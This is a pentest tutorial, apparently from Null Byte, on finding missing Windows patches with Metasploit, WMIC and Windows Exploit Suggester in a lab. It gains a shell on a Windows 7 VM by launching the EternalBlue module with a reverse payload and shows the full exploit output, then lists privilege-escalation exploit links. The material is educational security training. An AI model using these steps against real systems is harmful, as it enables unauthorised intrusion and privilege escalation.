How to Identify Missing Windows Patches for Easier Exploitation

Dec 12, 2019 07:00 PM

Windows is the most widely deployed desktop operating system and a steady stream of security patches ships for it, so from an attacker's point of view, knowing which patches are present on a Windows machine can make or break successful exploitation. Today, we will be covering three methods of patch enumeration, using Metasploit, WMIC, and Windows Exploit Suggester.

For Metasploit, we will use a post module to find missing patches. With WMIC, we will run commands directly from a shell on the system to view quick fix engineering patches. And using Windows Exploit Suggester, we will compare the installed patches on the system with a database of vulnerabilities. We will be using Kali Linux to attack an unpatched version of Windows 7.

Method 1: Metasploit

The first method we will use to identify any missing patches on the target is Metasploit. Fire it up by typing msfconsole in the terminal.

~# msfconsole

[-] Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file

                            To boldly go where no
                             shell has gone before
       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 >

We need a Meterpreter session on the target before the post module can run. Since we already know this Windows 7 box is unpatched, the quickest route is the MS17-010 EternalBlue exploit module; its built-in check confirms the target is vulnerable before the exploit fires, as the output below shows.

Load the module with the use command:

msf5 > use exploit/windows/smb/ms17_010_eternalblue

Set the required options (RHOSTS, plus LHOST and LPORT for the reverse payload) and type run to launch the exploit:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.0.1:1337
[+] 10.10.0.104:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.0.104:445 - Connecting to target for exploitation.
[+] 10.10.0.104:445 - Connection established for exploitation.
[+] 10.10.0.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.0.104:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.0.104:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.104:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.104:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.104:445 - Starting non-paged pool grooming
[+] 10.10.0.104:445 - Sending SMBv2 buffers
[+] 10.10.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.104:445 - Sending final SMBv2 buffers.
[*] 10.10.0.104:445 - Sending last fragment of exploit packet!
[*] 10.10.0.104:445 - Receiving response from exploit packet
[+] 10.10.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.104:445 - Sending egg to corrupted connection.
[*] 10.10.0.104:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.104
[*] Meterpreter session 1 opened (10.10.0.1:1337 -> 10.10.0.104:49228) at 2019-10-27 12:28:32 -0500
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

We now have a Meterpreter session on the target. Post modules run against an existing session rather than inside it, so we first background the session to get back to the msf5 prompt:

meterpreter > background

[*] Backgrounding session 1...

Then, we can load the module with the use command:

msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/enum_patches

If we type options at the prompt, Metasploit will show us all of the available options and settings for the current module:

msf5 post(windows/gather/enum_patches) > options

Module options (post/windows/gather/enum_patches):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   KB         KB2871997, KB2928120  yes       A comma separated list of KB patches to search for
   MSFLOCALS  true                  yes       Search for missing patchs for which there is a MSF local module
   SESSION                          yes       The session to run this module on.

All we really need to set is the session number. The KB option is just a comma-separated list of patches to look for by name (we could add more), and MSFLOCALS, which is on by default, additionally checks the patches tied to Metasploit's Windows local exploit modules. The defaults will work fine here.

Use the set command to set the number of the session we have running in the background:

msf5 post(windows/gather/enum_patches) > set session 1

session => 1

And type run to kick it off:

msf5 post(windows/gather/enum_patches) > run

[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed

The first two lines are the KB option at work: neither KB2871997 nor KB2928120 is installed. The rest come from MSFLOCALS and are leads, not confirmed vulnerabilities. The module only checks whether a KB is present; it does not check whether the corresponding exploit applies to this target. The EternalBlue output already told us this is Windows 7 SP1 x64, so the entries the module itself marks as x86-only (kitrap0d, schlamperei, track_popup_menu) can be set aside, and afdjoinleaf is for XP and 2003. A missing KB can also have been superseded by a later rollup, so each remaining candidate still has to be tested rather than assumed.

Method 2: WMIC

The next method we will use to enumerate patches is the Windows WMIC utility. WMIC (Windows Management Instrumentation Command-line) is the command-line front end for WMI; it runs either interactively, as a prompt of its own, or as one-shot commands. It ships with Windows 7, which is what we use here; on current Windows 10 and 11 builds it is deprecated and may be absent, in which case PowerShell's Get-HotFix, which queries the same Win32_QuickFixEngineering class, returns the same data.

To use this utility, we need a proper shell on the target. Luckily, we already have a Meterpreter session running, so we can use that to drop into a system shell.

Use the sessions command along with the -i flag to interact with a session:

msf5 > sessions -i 1

[*] Starting interaction with 1...

meterpreter >

Back at the Meterpreter prompt, type shell to drop into a Windows command prompt on the target:

meterpreter > shell

Process 2452 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Now we should be able to use the WMIC utility to view any patches that are installed. Type wmic qfe list at the prompt to list any quick fix engineering (QFE) patches that are present on the system:

C:\Windows\system32> wmic qfe list

wmic qfe list
Caption                                     CSName  Description  FixComments  HotFixID   InstallDate  InstalledBy        InstalledOn  Name  ServicePackInEffect  Status
http://support.microsoft.com/?kbid=2534111  W02     Hotfix                    KB2534111                                  2/25/2019
http://support.microsoft.com/?kbid=976902   W02     Update                    KB976902                W02\Administrator  11/21/2010

This will give us the ID, description, install information, and associated URL of the patches that are installed. We can also tack on full to our command to get a slightly different view of this data:

C:\Windows\system32> wmic qfe list full

wmic qfe list full

Caption=http://support.microsoft.com/?kbid=2534111
CSName=W02
Description=Hotfix
FixComments=
HotFixID=KB2534111
InstallDate=
InstalledBy=
InstalledOn=2/25/2019
Name=
ServicePackInEffect=
Status=

Caption=http://support.microsoft.com/?kbid=976902
CSName=W02
Description=Update
FixComments=
HotFixID=KB976902
InstallDate=
InstalledBy=W02\Administrator
InstalledOn=11/21/2010
Name=
ServicePackInEffect=
Status=

This method is nice because it needs nothing more than command execution on the target: querying Win32_QuickFixEngineering requires no administrator rights and no Meterpreter. Two caveats apply. QFE only lists updates installed through Windows' own servicing stack (not, for example, MSI-based updates to other Microsoft products), and a KB that is absent may still be covered by a later rollup that supersedes it, so pair this output with the bulletin lookups of the other two methods rather than treating an absence as a confirmed hole.
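As an added example (not code from the original post or from WMIC), the following Python script turns wmic qfe list full output into records and answers the question the raw listing only hints at: when was this box last patched? It also handles the UTF-16 encoding wmic uses when its output is redirected to a file, which trips up naive text processing. The sample text is constructed from the two records above; the reference date is assumed to be the day of the assessment, and InstalledOn is assumed to be in the US M/D/YYYY form shown above.

```python
"""Parse `wmic qfe list full` output and measure patch staleness.

Added example; not from the original post or the WMIC tool. The sample
below is constructed from the two hotfix records shown in the post.
"""
from datetime import date, datetime
from typing import Dict, List, Optional, Tuple, Union

# Constructed sample: the two records the post shows, as wmic prints them
# (records separated by blank lines, fields as Key=Value).
SAMPLE_QFE = """\
Caption=http://support.microsoft.com/?kbid=2534111
CSName=W02
Description=Hotfix
FixComments=
HotFixID=KB2534111
InstallDate=
InstalledBy=
InstalledOn=2/25/2019
Name=
ServicePackInEffect=
Status=


Caption=http://support.microsoft.com/?kbid=976902
CSName=W02
Description=Update
FixComments=
HotFixID=KB976902
InstallDate=
InstalledBy=W02\\Administrator
InstalledOn=11/21/2010
Name=
ServicePackInEffect=
Status=
"""


def decode_wmic(raw: bytes) -> str:
    """wmic writes UTF-16 with a BOM when redirected to a file
    (wmic qfe list full > qfe.txt); text pasted from an interactive
    shell is plain ASCII/ANSI. Handle both."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


def parse_qfe_full(text: str) -> List[Dict[str, str]]:
    """Split the output into one dict per hotfix record."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    # Redirected wmic output uses \r\r\n line endings; normalise first.
    for line in text.replace("\r", "").split("\n"):
        line = line.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, sep, value = line.partition("=")
        if sep:  # lines without '=' (e.g. an echoed command) are ignored
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return [r for r in records if r.get("HotFixID")]


def installed_kbs(records: List[Dict[str, str]]) -> List[str]:
    """Sorted, de-duplicated KB identifiers, upper-cased for comparison."""
    return sorted({r["HotFixID"].upper() for r in records})


def patch_staleness(records: List[Dict[str, str]], as_of: Union[date, str],
                    fmt: str = "%m/%d/%Y") -> Tuple[Optional[date], Optional[int]]:
    """Return (most recent InstalledOn date, days between it and as_of).

    InstalledOn is formatted in the target's locale; the post's US-English
    target uses M/D/YYYY, so that is the assumed default. Values that do
    not parse are skipped rather than guessed.
    """
    if isinstance(as_of, str):
        as_of = date.fromisoformat(as_of)
    dates = []
    for r in records:
        try:
            dates.append(datetime.strptime(r.get("InstalledOn", ""), fmt).date())
        except ValueError:
            continue
    if not dates:
        return None, None
    latest = max(dates)
    return latest, (as_of - latest).days


if __name__ == "__main__":
    recs = parse_qfe_full(decode_wmic(SAMPLE_QFE.encode("utf-8")))
    print("installed:", ", ".join(installed_kbs(recs)))
    # 2019-10-27 is the session date shown elsewhere in the post.
    latest, age = patch_staleness(recs, "2019-10-27")
    print(f"newest hotfix installed {latest}, {age} days before the assessment")
```

Against the post's target this reports KB2534111 as the newest hotfix, installed 244 days before the 10/27/2019 session; a gap that wide on a reachable Windows 7 host is a finding in its own right, before any specific KB is looked up.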

Method 3: Windows Exploit Suggester

The last method we will use to identify missing patches is Windows Exploit Suggester. This is a tool written in Python that will compare the patches installed on a target against a database of Microsoft vulnerabilities, all from our local machine.

Windows Exploit Suggester does require the output of systeminfo from the target to compare it against the database. Since we should still have shell access to our target, we can run the command:

C:\Windows\system32> systeminfo

systeminfo

Host Name:                 W02
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          admin2
Registered Organization:
Product ID:                00371-868-0000007-85704
Original Install Date:     2/25/2019, 2:04:46 PM
System Boot Time:          10/27/2019, 1:48:26 PM
System Manufacturer:       QEMU
System Model:              Standard PC (i440FX + PIIX, 1996)
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~2533 Mhz
BIOS Version:              SeaBIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org, 4/1/2014
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-06:00) Central Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,461 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,494 MB
Virtual Memory: In Use:    601 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    dlab.env
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.100
                                 IP address(es)
                                 [01]: 10.10.0.104
                                 [02]: fe80::104:336c:a632:e39b

Save that output to a text file on the Kali box. The simplest way is to copy it straight out of the terminal into a file; alternatively, redirect it on the target (for example systeminfo > C:\Users\Public\sysinfo.txt) and pull it back with Meterpreter's download command. Either way, the file, here system_info.txt, should contain exactly the systeminfo output shown above, which you can confirm with cat system_info.txt.

Next, we need to download the script from GitHub. The easiest way to do so is with the wget utility:

~# wget https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py

--2019-10-27 12:38:34--  https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 69175 (68K) [text/plain]
Saving to: ‘windows-exploit-suggester.py’

windows-exploit-suggester.py                          100%[======================================================================================================================>]  67.55K  --.-KB/s    in 0.07s

2019-10-27 12:38:34 (951 KB/s) - ‘windows-exploit-suggester.py’ saved [69175/69175]

Then install its one dependency, the xlrd module. The script is Python 2 code, so it needs the Python 2 build of the package, which on the Kali release used here is python-xlrd:

~# apt-get install python-xlrd

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  python-xlrd
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 104 kB of archives.
After this operation, 490 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 python-xlrd all 1.1.0-1 [104 kB]
Fetched 104 kB in 1s (144 kB/s)
Selecting previously unselected package python-xlrd.
(Reading database ... 408990 files and directories currently installed.)
Preparing to unpack .../python-xlrd_1.1.0-1_all.deb ...
Unpacking python-xlrd (1.1.0-1) ...
Setting up python-xlrd (1.1.0-1) ...
Processing triggers for man-db (2.8.5-2) ...

Now that the tool is set up, we need a copy of Microsoft's security bulletin spreadsheet, which is the database the script compares against. The --update flag downloads it and saves it as a dated .xls file. One caveat before relying on it: Microsoft stopped publishing bulletins in this spreadsheet in 2017 when it moved to the Security Update Guide, so nothing patched after that can show up, however recent the download is; for newer targets the successor project wesng (Windows Exploit Suggester - Next Generation) uses the Security Update Guide data instead.

~# python windows-exploit-suggester.py --update

[*] initiating winsploit version 3.3...
[+] writing to file 2019-10-27-mssb.xls
[*] done

We should be good to go at this point. All we have to do is run the tool, and specify the systeminfo file from earlier and the database file we just generated:

~# python windows-exploit-suggester.py --database 2019-10-27-mssb.xls --systeminfo system_info.txt

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file

The script will run and return any patches that are missing on our target, along with their relevant information and links:

[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 2 hotfix(es) against the 386 potential bulletins(s) with a database of 137 known exploits
[*] there are now 386 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*]
[E] MS16-059: Security Update for Windows Media Center (3150220) - Important
[*]   https://www.exploit-db.com/exploits/39805/ -- Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*]   https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 JavaScriptStackWalker Memory Corruption (MS15-056)
[*]   http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker memory corruption

...

[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[*] done

This method is the most thorough of the three, since it checks every installed hotfix against a full bulletin database, and it runs entirely offline on our machine: all it needs from the target is systeminfo output, which any shell running as any user can produce. The trade-off is noise. The script flags a bulletin whenever none of its KBs appear in the hotfix list, whether or not the affected component (Internet Explorer, Media Center, Windows Journal) is even installed, and without regard to patches superseded by later rollups, so its list is a starting point for triage, not a finding. In practice, start with the [M] entries that match the target's OS and architecture, since those have a ready Metasploit module.

Wrapping Up

In this tutorial, we explored a few methods to identify missing patches on a Windows machine. First, we used a Metasploit post module to achieve this, followed by the WMIC utility on Windows, and finally, the Windows Exploit Suggester Python script. Patch enumeration is extremely important when attacking Windows, as it narrows down the number of potential exploits, saves time, and generally just makes things easier.

Cover image by Breakingpic/Pexels; Screenshots by drd_/Null Byte
